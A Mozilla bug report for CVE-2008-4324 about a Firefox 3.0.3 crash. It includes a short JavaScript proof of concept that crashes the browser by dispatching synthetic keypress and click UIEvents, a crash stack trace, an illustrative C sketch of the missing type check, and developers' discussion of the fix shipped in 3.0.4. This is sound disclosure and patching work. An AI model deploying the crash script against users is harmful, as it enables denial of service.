Closed
Bug 457543
(CVE-2008-4324)
Opened 16 years ago
Closed 16 years ago
FireFox Crashed , Unhandle User Interface Dispatcher Events
Categories
(Core :: DOM: Events, defect)
Status: VERIFIED FIXED
People
(Reporter: adi.zerok, Unassigned)
Details
(Keywords: verified1.9.0.4, Whiteboard: [sg:dupe 454820])
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla 3.0.3

Mozilla 3.0.3 crashes with an unhandled exception in User Interface Dispatcher Events. If a user tries to restore the session, the 3.0.3 version still crashes.

Reproducible: Always

Steps to Reproduce:

    <script language="JavaScript">
    var moz303 = document.createEvent("UIEvents");
    moz303.initUIEvent("keypress", true, true, this, 1);
    for (var moz303_loop = 1; moz303_loop < 10; moz303_loop++) {
        document.documentElement.dispatchEvent(moz303);
    }
    moz303.initUIEvent("click", true, true, this, 1);
    for (var moz303_loop = 1; moz303_loop < 10; moz303_loop++) {
        document.documentElement.dispatchEvent(moz303);
    }
    </script>

The smaller POC code.

Actual Results:
Mozilla crashes straight away.

Expected Results:
The software should have handled the exception with some check introduced to the user.

The bug gets replicated every time.

Updated (Reporter) • 16 years ago
Severity: normal → critical
CC list accessible: false
Version: unspecified → 3.0 Branch
I see this on Linux as well, on 3.0 but not on mozilla-central.
OS: Windows XP → All
Hardware: PC → All
Comment 2 (Reporter) • 16 years ago
But it's really hitting 3.0.3 as per the details provided above. Needs to be fixed.
Comment 3 • 16 years ago
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out.

Exception Type: EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread: 0

Thread 0 Crashed:
0 libxpcom_core.dylib nsTArray_base::Length() const + 11 (nsTArray.h:66)
1 libgklayout.dylib nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083)
2 libgklayout.dylib nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173)
3 libgklayout.dylib nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080)
4 libgklayout.dylib nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186)
5 libgklayout.dylib nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211)
6 libgklayout.dylib nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293)
7 libgklayout.dylib nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323)
8 libgklayout.dylib nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483)
9 libgklayout.dylib nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541)
10 libgklayout.dylib nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310)
...etc...
Component: Security → DOM: Events
Product: Firefox → Core
QA Contact: firefox → events
Whiteboard: [sg:investigate] null-deref DoS?
Version: 3.0 Branch → 1.9.0 Branch
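The stack in comment 3 shows a key-event handler (nsXBLKeyEventHandler::HandleEvent, then GetAccelKeyCandidates) reached by a script-created UIEvent that merely carries the name "keypress". The following is an added example for this page, a simplified model and not Gecko's code, with all struct and function names assumed: it contrasts a handler that downcasts on the strength of the DOM event name with one that checks the native struct's type tag first, the class of check that turns this null-deref crash into a harmless early return.

```c
#include <stddef.h>
#include <stdint.h>
/* Simplified model for this page, not Gecko's code: each native event carries
 * a struct-type tag; a key event extends the base with a pointer to its
 * alternative-char-code array (names assumed). */
enum event_struct_type { EV_UI_EVENT = 1, EV_KEY_EVENT = 2 };
struct event_base {
    enum event_struct_type type;   /* what the native struct really is */
    const char *dom_name;          /* "keypress", "click": chosen by script */
};
struct char_code_array { size_t length; uint32_t *codes; };
struct key_event {
    struct event_base base;                 /* first member: usable as base */
    struct char_code_array *alt_char_codes; /* NULL when never populated */
};

/* Vulnerable pattern: trusts dom_name ("keypress") and downcasts blindly.
 * With a plain UI event the read past the base struct yields garbage or
 * NULL, the shape of the null-deref in the stack above. Not executed. */
size_t candidate_count_unchecked(struct event_base *ev) {
    struct key_event *key = (struct key_event *)ev;
    return key->alt_char_codes->length;
}

/* Hardened pattern: check the native type tag before downcasting and treat
 * a missing array as "no candidates". Returns -1 for a non-key event. */
int candidate_count_checked(struct event_base *ev, size_t *out) {
    if (ev == NULL || ev->type != EV_KEY_EVENT)
        return -1;                   /* synthesized UIEvent: not a key event */
    struct key_event *key = (struct key_event *)ev;
    *out = key->alt_char_codes ? key->alt_char_codes->length : 0;
    return 0;
}

/* PoC scenario: a UI event whose DOM name is "keypress". Returns 1 if rejected. */
int synthetic_keypress_is_rejected(void) {
    struct event_base ui = { EV_UI_EVENT, "keypress" };
    size_t n = 0;
    return candidate_count_checked(&ui, &n) == -1;
}

/* Genuine key event with two constructed alternative char codes. */
size_t real_keypress_candidate_count(void) {
    uint32_t codes[2] = { 0x41, 0x61 };
    struct char_code_array arr = { 2, codes };
    struct key_event key = { { EV_KEY_EVENT, "keypress" }, &arr };
    size_t n = 0;
    return candidate_count_checked(&key.base, &n) == 0 ? n : (size_t)-1;
}
```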
Updated • 16 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 4 • 16 years ago
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Keywords: qawanted
Whiteboard: [sg:investigate] null-deref DoS? → [sg:investigate] null-deref DoS? Fix range?
Comment 5 • 16 years ago
Didn't Mats just fix this or a variant of this?
Comment 6 • 16 years ago
(In reply to comment #5)
> Didn't Mats just fix this or a variant of this.
Bug 454820
Comment 7 (Reporter) • 16 years ago
So what's the actual update? I think I have given the specific version 3.0.3, and the version details are: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Comment 8 (Reporter) • 16 years ago
Let me know the specifications of the fix.
Comment 9 • 16 years ago
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/). It will be ported to 3.0.x builds.
Comment 10 (Reporter) • 16 years ago
Let me know the specifications of the fix.
Comment 11 (Reporter) • 16 years ago
Last query: when exactly will it be ported to 3.0.x builds?
Updated • 16 years ago
Status: NEW → RESOLVED
Closed: 16 years ago
Keywords: qawanted
Resolution: --- → DUPLICATE
Whiteboard: [sg:investigate] null-deref DoS? Fix range? → [sg:dupe 454820]
Updated • 16 years ago
CC list accessible: true
Comment 13 (Reporter) • 16 years ago
If it was resolved previously, why is it not ported to the 3.0.3 version?
Comment 14 (Reporter) • 16 years ago
If it was resolved previously, why is it not ported to the 3.0.3 version?
Updated (Reporter) • 16 years ago
Resolution: DUPLICATE → WONTFIX
Comment 15 • 16 years ago
It was found and fixed in our "development" version that will become 3.1, general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix. 3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
Comment 16 • 16 years ago
This has been posted to milw0rm: http://www.milw0rm.com/exploits/6614 I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings. Original URL was: http://www.secniche.org/moz303
Group: core-security
Resolution: WONTFIX → DUPLICATE
Updated • 16 years ago
Flags: wanted1.8.1.x-
Flags: blocking1.9.0.4+
Comment 18 • 16 years ago
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Depends on: 454820
Resolution: DUPLICATE → FIXED
Updated • 16 years ago
Alias: CVE-2008-4324
Comment 20 • 16 years ago
(In reply to comment #18)
> This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Adding the fixed1.9.0.4 keyword then. :)
Keywords: fixed1.9.0.4
Comment 21 • 16 years ago
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.
Status: RESOLVED → VERIFIED
Keywords: fixed1.9.0.4 → verified1.9.0.4